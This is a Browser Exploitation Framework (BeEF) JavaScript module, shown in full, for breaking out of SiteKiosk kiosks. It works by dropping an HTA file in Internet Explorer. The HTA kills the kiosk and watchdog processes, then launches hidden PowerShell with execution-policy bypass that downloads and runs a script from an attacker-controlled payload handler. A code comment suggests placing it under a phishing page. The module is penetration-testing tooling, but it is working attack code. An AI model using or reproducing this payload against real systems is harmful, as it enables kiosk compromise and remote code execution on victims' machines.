1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
    if(beef.browser.isIE()){
10
        // application='yes' is IE-only and needed to load the HTA into an IFrame.
11
        // in this way you can have your phishing page, and load the HTA on top of it
12
        // beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'});
13
	bb = new MSBlobBuilder();
14
	bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM Watchdog.exe\');<\/script>');
15
	bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM SiteKiosk.exe\');<\/script>');
16
	bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring(\\\\\\"<%= @payload_handler %>\\\\\\"))"\');<\/script>');
17
	window.navigator.msSaveOrOpenBlob(bb.getBlob(),"BREAKOUT.hta");
18
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');
19
    }
20
});
21

22